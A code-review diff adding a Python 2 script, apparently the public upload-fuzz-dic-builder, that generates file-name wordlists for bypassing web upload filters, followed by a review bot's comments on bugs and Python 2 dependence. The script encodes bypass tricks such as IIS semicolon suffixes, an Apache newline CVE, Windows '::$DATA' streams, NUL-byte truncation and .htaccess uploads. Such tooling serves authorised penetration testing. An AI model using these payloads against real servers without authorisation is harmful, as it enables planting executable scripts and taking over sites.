|
| 1 | +#coding=utf-8 |
| 2 | +''' |
| 3 | +author: c0ny1<root@gv7.me> |
| 4 | +github: https://github.com/c0ny1/upload-fuzz-dic-builder |
| 5 | +date: 2018-11-04 23:16 |
| 6 | +description: 生成符合漏洞实际场景fuzz字典的脚本 |
| 7 | +''' |
| 8 | + |
| 9 | +import argparse |
| 10 | +import copy |
| 11 | +import urllib |
| 12 | + |
| 13 | +## 各类语言可解析的后缀 |
| 14 | +html_parse_suffix = ['html','htm','phtml','pht','Html','Htm','pHtml'] |
| 15 | +asp_parse_suffix = ['asp','aspx','asa','asax','ascx','ashx','asmx','cer','aSp','aSpx','aSa','aSax','aScx','aShx','aSmx','cEr'] |
| 16 | +php_parse_suffix = ['php','php5','php4','php3','php2','pHp','pHp5','pHp4','pHp3','pHp2'] |
| 17 | +jsp_parse_suffix = ['jsp','jspa','jspx','jsw','jsv','jspf','jtml','jSp','jSpx','jSpa','jSw','jSv','jSpf','jHtml'] |
| 18 | + |
| 19 | + |
| 20 | +## web中间件解析漏洞 |
| 21 | +def iis_suffix_creater(suffix): |
| 22 | + res = [] |
| 23 | + for l in suffix: |
| 24 | + str ='%s;.%s' % (l,allow_suffix) |
| 25 | + res.append(str) |
| 26 | + return res |
| 27 | + |
| 28 | +def apache_suffix_creater(suffix): |
| 29 | + res = [] |
| 30 | + for l in suffix: |
| 31 | + str = '%s.xxx' % l |
| 32 | + res.append(str) |
| 33 | + str = '%s%s' % (l,urllib.unquote('%0a')) #CVE-2017-15715 |
| 34 | + res.append(str) |
| 35 | + return res |
| 36 | + |
| 37 | +win_tomcat = ['%20','::$DATA','/'] |
| 38 | +def tomcat_suffix_creater(suffix): |
| 39 | + res = [] |
| 40 | + for l in suffix: |
| 41 | + for t in win_tomcat: |
| 42 | + str = '%s%s' % (l,t) |
| 43 | + res.append(str) |
| 44 | + return res |
| 45 | + |
| 46 | +## 系统特性 |
| 47 | +def str_81_to_ff(): |
| 48 | + res = [] |
| 49 | + for i in range(129,256): |
| 50 | + str = '%x' % i |
| 51 | + str = '%' + str |
| 52 | + str = urllib.unquote(str) |
| 53 | + res.append(str) |
| 54 | + return res |
| 55 | + |
| 56 | +windows_os = [' ','.','/','::$DATA','<','>','>>>','%20','%00'] + str_81_to_ff() |
| 57 | + |
| 58 | +def windows_suffix_creater(suffix): |
| 59 | + res = [] |
| 60 | + for s in suffix: |
| 61 | + for w in windows_os: |
| 62 | + str = '%s%s' % (s,w) |
| 63 | + res.append(str) |
| 64 | + return res |
| 65 | + |
| 66 | +## 脚本语言漏洞(00截断) |
| 67 | +def str_00_truncation(suffix,allow_suffix): |
| 68 | + res = [] |
| 69 | + for i in suffix: |
| 70 | + str = '%s%s.%s' % (i,'%00',allow_suffix) |
| 71 | + res.append(str) |
| 72 | + str = '%s%s.%s' % (i,urllib.unquote('%00'),allow_suffix) |
| 73 | + res.append(str) |
| 74 | + return res |
| 75 | + |
| 76 | +## 返回字符串所有大写可能 |
| 77 | +def str_case_mixing(word): |
| 78 | + str_list = [] |
| 79 | + word = word.lower() |
| 80 | + tempWord = copy.deepcopy(word) |
| 81 | + plist = [] |
| 82 | + redict = {} |
| 83 | + for char in range( len( tempWord ) ): |
| 84 | + char = word[char] |
| 85 | + plist.append(char) |
| 86 | + num = len( plist ) |
| 87 | + for i in range( num ): |
| 88 | + for j in range( i , num + 1 ): |
| 89 | + sContent = ''.join( plist[0:i] ) |
| 90 | + mContent = ''.join( plist[i:j] ) |
| 91 | + mContent = mContent.upper() |
| 92 | + eContent = ''.join( plist[j:] ) |
| 93 | + content = '''%s%s%s''' % (sContent,mContent,eContent) |
| 94 | + redict[content] = None |
| 95 | + |
| 96 | + for i in redict.keys(): |
| 97 | + str_list.append(i) |
| 98 | + |
| 99 | + return str_list |
| 100 | + |
| 101 | +## list大小写混合 |
| 102 | +def list_case_mixing(li): |
| 103 | + res = [] |
| 104 | + for l in li: |
| 105 | + res += str_case_mixing(l) |
| 106 | + return res |
| 107 | + |
| 108 | +## 双后缀生成 |
| 109 | +def str_double_suffix_creater(suffix): |
| 110 | + res = [] |
| 111 | + for i in range(1,len(suffix)): |
| 112 | + str = list(suffix) |
| 113 | + str.insert(i,suffix) |
| 114 | + res.append("".join(str)) |
| 115 | + return res |
| 116 | + |
| 117 | +def list_double_suffix_creater(list_suffix): |
| 118 | + res = [] |
| 119 | + for l in list_suffix: |
| 120 | + res += str_double_suffix_creater(l) |
| 121 | + return duplicate_removal(res) |
| 122 | + |
| 123 | +#list 去重 |
| 124 | +def duplicate_removal(li): |
| 125 | + return list(set(li)) |
| 126 | + |
| 127 | +#list 去空行 |
| 128 | +def clear_list(li): |
| 129 | + rmstr = ['',' ',None] |
| 130 | + for l in li: |
| 131 | + for r in rmstr: |
| 132 | + if l == r: |
| 133 | + li.remove(r) |
| 134 | + return li |
| 135 | + |
| 136 | +def parse_args(): |
| 137 | + parser = argparse.ArgumentParser(prog='upload-fuzz-dic-builder', |
| 138 | + formatter_class=argparse.RawTextHelpFormatter, |
| 139 | + description='') |
| 140 | + |
| 141 | + parser.add_argument('-n','--upload-filename',metavar='',dest='upload_file_name', type=str, default='test', |
| 142 | + help=u'Upload file name') |
| 143 | + |
| 144 | + parser.add_argument('-a','--allow-suffix',metavar='',dest='allow_suffix', type=str, default='jpg', |
| 145 | + help=u'Allowable upload suffix') |
| 146 | + |
| 147 | + parser.add_argument('-l','--language',metavar='',dest='language',choices=['asp','php','jsp','all'], type=str, default='all', |
| 148 | + help='Uploaded script language') |
| 149 | + |
| 150 | + parser.add_argument('-m','--middleware',metavar='',dest='middleware',choices=['iis','apache','tomcat','all'],type=str, default='all', |
| 151 | + help='Middleware used in Web System') |
| 152 | + parser.add_argument('--os',metavar='',dest='os', choices=['win','linux','all'],type=str, default='all', |
| 153 | + help='Target operating system type') |
| 154 | + |
| 155 | + parser.add_argument('-d','--double-suffix',dest='double_suffix', default=False,action='store_true', |
| 156 | + help='Is it possible to generate double suffix?') |
| 157 | + parser.add_argument('-o','--output',metavar='',dest='output_filename', type=str, default='upload_fuzz_dic.txt', |
| 158 | + help='Output file') |
| 159 | + |
| 160 | + args = parser.parse_args() |
| 161 | + return args |
| 162 | + |
| 163 | +if __name__ == '__main__': |
| 164 | + |
| 165 | + args = parse_args() |
| 166 | + upload_file_name = args.upload_file_name |
| 167 | + allow_suffix = args.allow_suffix |
| 168 | + output_filename =args.output_filename |
| 169 | + |
| 170 | + language = args.language |
| 171 | + middleware = args.middleware |
| 172 | + os = args.os |
| 173 | + double_suffix =args.double_suffix |
| 174 | + |
| 175 | + if middleware == 'iis': |
| 176 | + os = 'win' |
| 177 | + |
| 178 | + ################################### |
| 179 | + |
| 180 | + f = open(output_filename,'w') |
| 181 | + parse_suffix = [] |
| 182 | + case_parse_suffix = [] |
| 183 | + middleware_parse_suffix = [] |
| 184 | + htaccess_suffix = [] |
| 185 | + os_parse_suffix = [] |
| 186 | + double_parse_suffix = [] |
| 187 | + |
| 188 | + |
| 189 | + # 可解析后缀 |
| 190 | + if language == 'asp': |
| 191 | + html_parse_suffix = [] |
| 192 | + php_parse_suffix = [] |
| 193 | + jsp_parse_suffix = [] |
| 194 | + parse_suffix = asp_parse_suffix |
| 195 | + elif language == 'php': |
| 196 | + asp_parse_suffix = [] |
| 197 | + jsp_parse_suffix = [] |
| 198 | + parse_suffix = html_parse_suffix + php_parse_suffix |
| 199 | + elif language == 'jsp': |
| 200 | + html_parse_suffix = [] |
| 201 | + asp_parse_suffix = [] |
| 202 | + php_parse_suffix = [] |
| 203 | + parse_suffix = jsp_parse_suffix |
| 204 | + else: # language == 'all' |
| 205 | + parse_suffix = html_parse_suffix + asp_parse_suffix + php_parse_suffix + jsp_parse_suffix |
| 206 | + print u'[+] 收集%d条可解析后缀完毕!' % len(parse_suffix) |
| 207 | + |
| 208 | + # 可解析后缀 + 大小写混合 |
| 209 | + if os == 'win' or os == 'all': |
| 210 | + case_html_parse_suffix = list_case_mixing(html_parse_suffix) |
| 211 | + case_asp_parse_suffix = list_case_mixing(asp_parse_suffix) |
| 212 | + case_php_parse_suffix = list_case_mixing(php_parse_suffix) |
| 213 | + case_jsp_parse_suffix = list_case_mixing(jsp_parse_suffix) |
| 214 | + case_parse_suffix = list_case_mixing(parse_suffix) |
| 215 | + print u'[+] 加入%d条可解析后缀大小写混合完毕!' % len(case_parse_suffix) |
| 216 | + else: # os == 'linux' |
| 217 | + case_html_parse_suffix = html_parse_suffix |
| 218 | + case_asp_parse_suffix = asp_parse_suffix |
| 219 | + case_php_parse_suffix = php_parse_suffix |
| 220 | + case_jsp_parse_suffix = jsp_parse_suffix |
| 221 | + case_parse_suffix = parse_suffix |
| 222 | + |
| 223 | + # 中间件漏洞 |
| 224 | + if middleware == 'iis': |
| 225 | + case_asp_php_jsp_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_jsp_parse_suffix |
| 226 | + middleware_parse_suffix = iis_suffix_creater(case_asp_php_jsp_parse_suffix) |
| 227 | + elif middleware == 'apache': |
| 228 | + case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix |
| 229 | + middleware_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix) |
| 230 | + elif middleware == 'tomcat' and os == 'linux': |
| 231 | + middleware_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix |
| 232 | + elif middleware == 'tomcat' and (os == 'win' or os == 'all'): |
| 233 | + case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix |
| 234 | + middleware_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix) |
| 235 | + else: |
| 236 | + case_asp_php_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix |
| 237 | + iis_parse_suffix = iis_suffix_creater(case_asp_php_parse_suffix) |
| 238 | + case_asp_php_html_parse_suffix = case_asp_parse_suffix + case_php_parse_suffix + case_html_parse_suffix |
| 239 | + apache_parse_suffix = apache_suffix_creater(case_asp_php_html_parse_suffix) |
| 240 | + case_php_jsp_parse_suffix = case_php_parse_suffix + case_jsp_parse_suffix |
| 241 | + tomcat_parse_suffix = tomcat_suffix_creater(case_php_jsp_parse_suffix) |
| 242 | + middleware_parse_suffix = iis_parse_suffix + apache_parse_suffix + tomcat_parse_suffix |
| 243 | + |
| 244 | + middleware_parse_suffix = duplicate_removal(middleware_parse_suffix) |
| 245 | + print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix) |
| 246 | + |
| 247 | + # .htaccess |
| 248 | + if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'): |
| 249 | + htaccess_suffix = str_case_mixing(".htaccess") |
| 250 | + print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix) |
| 251 | + elif (middleware == 'apache' or middleware == 'all') and os == 'linux': |
| 252 | + htaccess_suffix = ['.htaccess'] |
| 253 | + print u'[+] 加入1条.htaccess' |
| 254 | + else: |
| 255 | + htaccess_suffix = [] |
| 256 | + |
| 257 | + # 系统特性 |
| 258 | + if os == 'win': |
| 259 | + os_parse_suffix = windows_suffix_creater(case_parse_suffix) |
| 260 | + elif os == 'linux': |
| 261 | + os_parse_suffix = parse_suffix |
| 262 | + else: |
| 263 | + win_suffix = windows_suffix_creater(case_parse_suffix) |
| 264 | + linux_suffix = parse_suffix |
| 265 | + os_parse_suffix = win_suffix + linux_suffix |
| 266 | + |
| 267 | + os_parse_suffix = duplicate_removal(os_parse_suffix) |
| 268 | + print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix) |
| 269 | + |
| 270 | + # 语言漏洞 |
| 271 | + |
| 272 | + language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix) |
| 273 | + |
| 274 | + # 双后缀 + 大小写混合 |
| 275 | + if double_suffix: |
| 276 | + double_parse_suffix = list_double_suffix_creater(case_parse_suffix) |
| 277 | + print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix) |
| 278 | + else: |
| 279 | + double_parse_suffix = [] |
| 280 | + |
| 281 | + all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix |
| 282 | + all_parse_suffix = duplicate_removal(all_parse_suffix) |
| 283 | + all_parse_suffix = clear_list(all_parse_suffix) |
| 284 | + # 写文件 |
| 285 | + num = len(all_parse_suffix) |
| 286 | + for i in all_parse_suffix: |
| 287 | + str = '%s.%s' % (upload_file_name,i) |
| 288 | + #print '[+] '+type(str) |
| 289 | + f.write(str) |
| 290 | + f.write('\n') |
| 291 | + num += len(htaccess_suffix) |
| 292 | + for i in htaccess_suffix: |
| 293 | + f.write(i) |
| 294 | + f.write('\n') |
| 295 | + f.close() |
| 296 | + print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename) |
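Review bot: `iis_suffix_creater` (new-file line 24) builds `'%s;.%s' % (l, allow_suffix)` from `allow_suffix` as a free name that only exists because the `__main__` block assigns it at module level, so importing the module or calling the helper from anywhere else raises NameError, and it is inconsistent with `str_00_truncation`, which takes the same value as a parameter. Make the dependency explicit with `def iis_suffix_creater(suffix, allow_suffix):` and pass it at both call sites, `iis_suffix_creater(case_asp_php_jsp_parse_suffix, allow_suffix)` and `iis_suffix_creater(case_asp_php_parse_suffix, allow_suffix)`. Separately, `clear_list` calls `li.remove(r)` while iterating the same list, which skips the element that follows each removal, so an empty entry adjacent to another can survive into the output; a filtering comprehension over `('', ' ', None)` avoids that. Note also that the dictionary is written with raw NUL and 0x81–0xFF bytes produced by `urllib.unquote` (the truncation and encoding probes), so anything that consumes the output file must read it as bytes rather than decoded text, and the `print` statements and `urllib.unquote` pin this script to Python 2.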